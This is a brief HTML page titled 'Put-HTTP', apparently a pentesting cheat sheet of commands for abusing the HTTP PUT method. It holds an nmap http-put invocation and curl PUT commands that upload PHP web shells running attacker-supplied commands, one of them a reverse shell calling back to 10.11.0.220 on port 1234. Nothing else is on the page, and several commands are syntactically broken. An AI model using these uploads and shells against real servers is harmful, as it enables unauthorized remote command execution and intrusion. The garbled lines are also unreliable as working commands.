<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Put-HTTP</title>
</head><body>nmap -p 80 192.168.0.105 --script http-put --script-args http-put.url'/test/shell.php',http-put.file='shell.php'<br/>
<br/>
-------------------------------------------<br/>
<br/>
curl http://victim-site.com --upload-file file.txt<br/>
<br/>
curl -X PUT -d '&lt;?php system($_GET["exec"]); ?&gt;' http://192.168.0.105/test/shell.php<br/>
<br/>
curl -X PUT -d '&lt;?php system($_REQUEST["exec"]); ?&gt;' http://10.11.1.14/shell.asp<br/>
<br/>
then you can enter 192.168.0.105/test/shell.php/?exec=ifconfig<br/>
-------------------------------------------<br/>
<br/>
curl -X PUT -d 'http://10.11.0.220/shell-p-444.asp' http://10.11.1.14/shell.asp<br/>
<br/>
<br/>
curl -X PUT -d '&lt;?php -r '$sock=fsockopen(10.11.0.220",1234);exec("/bin/sh -i &lt;&amp;d &gt;&amp;%d 2&gt;&amp;%d",f,f,f)' ?&gt;' http://10.11.1.14/shell.txt<br/>
<br/>
<br/>
curl -X PUT -d '&lt;?php if(isset($_REQUEST['cmd'])){ echo "&lt;pre&gt;"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "&lt;/pre&gt;"; die; }?&gt;' http://10.11.1.229/poopypants.txt</body></html>